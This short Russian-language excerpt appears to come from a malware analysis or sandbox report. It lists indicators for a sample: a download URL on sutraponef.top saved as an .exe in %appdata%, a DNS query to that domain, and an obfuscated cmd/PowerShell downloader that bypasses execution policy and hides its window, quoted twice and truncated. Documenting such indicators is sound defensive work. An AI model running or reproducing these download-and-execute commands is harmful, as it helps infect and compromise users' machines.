Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^wEr^ShEll^.E^x^e^ -^ExeCUT^i^On^Po^lI^cY ^bYpAss -no^prof^IL^e^ -WIndow^STYle h^Id^dEn (^N^ew-O^BjE^C^T^ sYS^tem^.^N^ET.^w^Eb^C^lIen^T)^.DOwnLoAdfILE('http://sutraponef.top/re...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "pO^wEr^ShEll^.E^x^e^ -^ExeCUT^i^On^Po^lI^cY ^bYpAss -no^prof^IL^e^ -WIndow^STYle h^Id^dEn (^N^ew-O^BjE^C^T^ sYS^tem^.^N^ET.^w^Eb^C^lIen^T)^.DOwnLoAdfILE('http://sutraponef.top/re...' (со скрытым окном)